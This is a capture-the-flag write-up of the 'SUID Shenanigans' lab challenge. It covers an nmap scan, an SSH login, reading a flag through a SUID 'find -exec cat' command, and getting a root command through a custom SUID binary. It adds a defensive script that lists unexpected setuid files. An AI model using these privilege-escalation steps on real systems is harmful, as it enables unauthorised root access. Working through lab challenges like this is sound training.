From aldeid

[Day 8] SUID Shenanigans 08/12/2019


Elf Holly is suspicious of Elf-ministrator and wants to get onto the root account of a server he set up to see what files are on his account. The problem is, Holly is a low-privileged user. Can you escalate her privileges and hack your way into the root account?

Deploy and SSH into the machine.

* Username: holly
* Password: [email protected]*TU

SSH is not running on the standard port. You might need to nmap scan the machine to find which port SSH is running on:

nmap <machine_ip> -p <start_port>-<end_port>

Read the supporting materials here.

#1 - What port is SSH running on?

SSH is running on port 65534.

$ sudo nmap -sS -sV -A -p-
[sudo] password for unknown: 
Starting Nmap 7.80 ( ) at 2020-05-02 08:10 CEST
Nmap scan report for
Host is up (0.046s latency).
Not shown: 65534 closed ports
65534/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:59:b7:f7:3d:5e:11:92:24:91:03:cd:fa:7e:c7:e6 (RSA)
|   256 15:eb:e2:c6:9e:fb:18:a2:ce:b2:e6:96:87:f7:fa:f8 (ECDSA)
|_  256 f8:8b:d5:02:1b:2f:59:67:a9:f5:bc:a5:7b:ef:2b:50 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
1   47.20 ms
2   45.90 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 183.66 seconds

#2 - Find and run a file as igor. Read the file /home/igor/flag1.txt

Let's connect with ssh [email protected] -p 65534, using the password [email protected]*TU.

Unfortunately, we have insufficient permissions to read /home/igor/flag1.txt. Let's start by listing the files owned by igor that have the SUID bit set:

[email protected]:~$ find / -user igor -perm -4000 -print 2>/dev/null

One of the candidates is nmap. Older versions of nmap had an interactive mode (--interactive) that let you run shell commands from inside nmap, which would inherit igor's effective UID. The version installed here is recent, though, and the option is gone:

[email protected]:~$ nmap --interactive
nmap: unrecognized option '--interactive'
Nmap 7.01 ( )

Let's try find instead. The binary is owned by igor and has the SUID bit set:

$ ls -l /usr/bin/find
-rwsr-xr-x 1 igor igor 221768 Feb  7  2016 /usr/bin/find

Because find runs with igor's effective UID, anything it launches through -exec inherits that UID, so cat can read the flag. (For an interactive shell rather than a single file read, the shell must be started with -p, since bash drops an effective UID that differs from the real UID unless it is told not to.)

$ find /home/igor/flag1.txt -exec cat {} \;

#3 - Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?

Now we need to run something as root, so let's list the SUID files owned by root:

$ find / -user root -perm -4000 -print 2>/dev/null
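The two enumeration steps above (SUID files owned by igor, then by root) are the same check with a different owner filter, and the real work is spotting which entries do not belong on a stock install. The script below is an added example, not part of the original writeup or the room: it wraps the find command in a function and filters the result against a baseline of expected setuid binaries. The baseline is a constructed sample of common Ubuntu 16.04 entries (not a complete inventory), and the scan list is constructed to look like the room's box; on a real engagement, diff against a clean reference host of the same release instead.

```shell
#!/bin/sh
# Added example for this writeup (not part of the original page or the room):
# enumerate setuid files and flag the ones a stock install would not have.
# BASELINE is a constructed sample of common Ubuntu 16.04 setuid binaries,
# not a complete inventory; SCAN below is a constructed result list.

# find_suid DIR [USER]
# Print setuid regular files under DIR (optionally only those owned by USER),
# one path per line, sorted. 2>/dev/null hides the permission-denied noise a
# low-privileged user gets when walking /.
find_suid() {
    if [ -n "$2" ]; then
        find "$1" -type f -perm -4000 -user "$2" -print 2>/dev/null | sort
    else
        find "$1" -type f -perm -4000 -print 2>/dev/null | sort
    fi
}

# suid_unexpected BASELINE_FILE
# Read scan output on stdin and print only the paths missing from the baseline.
# -x matches whole lines and -F treats baseline entries as literals, so
# /bin/ping in the baseline cannot match /bin/ping6 or /opt/bin/ping.
# grep exits 1 when nothing is selected (everything was expected), which is a
# clean result rather than an error, so only exit status 2 propagates.
suid_unexpected() {
    grep -vxF -f "$1" || [ $? -eq 1 ]
}

# Constructed baseline, written to a temp file so grep -f can read it.
BASELINE=$(mktemp)
trap 'rm -f "$BASELINE"' EXIT
cat > "$BASELINE" <<'EOF'
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
EOF

# Constructed scan output resembling the room's box (unsorted on purpose).
SCAN='/usr/bin/system-control
/bin/ping
/usr/bin/find
/bin/su
/bin/mount
/usr/bin/nmap
/usr/bin/passwd
/usr/bin/sudo
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp'

# triage_sample: run the constructed scan through the baseline filter.
triage_sample() {
    printf '%s\n' "$SCAN" | sort -u | suid_unexpected "$BASELINE"
}

# demo_live: build a throwaway tree with one setuid file and one plain file to
# exercise find_suid on real inodes. chmod u+s on a file you own needs no root;
# a nosuid mount ignores the bit at exec time but the mode bit is still set,
# which is all -perm -4000 tests.
demo_live() {
    d=$(mktemp -d)
    : > "$d/plain"
    : > "$d/setuid"
    chmod 0755 "$d/plain"
    chmod 4755 "$d/setuid"
    find_suid "$d"
    rm -rf "$d"
}

echo "== unexpected setuid binaries (constructed scan) =="
triage_sample
echo "== live find_suid on a temp tree =="
demo_live
```

On the room's box the three lines the filter leaves behind (find, nmap, system-control) are exactly the ones worth a second look; ping, su, passwd and friends are setuid on every Ubuntu of that era and are not where the privilege escalation lies.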

ping has the SUID bit set, which is common on older distributions because it needs a raw socket (newer builds use the CAP_NET_RAW capability instead). However, I haven't been able to exploit it to access the flag.

Going through the list, I found that system-control stands out as a custom binary (not found anywhere else on my Linux boxes). It simply executes whatever command it is given, as root:

[email protected]:~$ /usr/bin/system-control

===== System Control Binary =====

Enter system command: cat /root/flag2.txt


If you've finished the challenge and want more practice, check out the Privilege Escalation Playground room created by SherlockSec.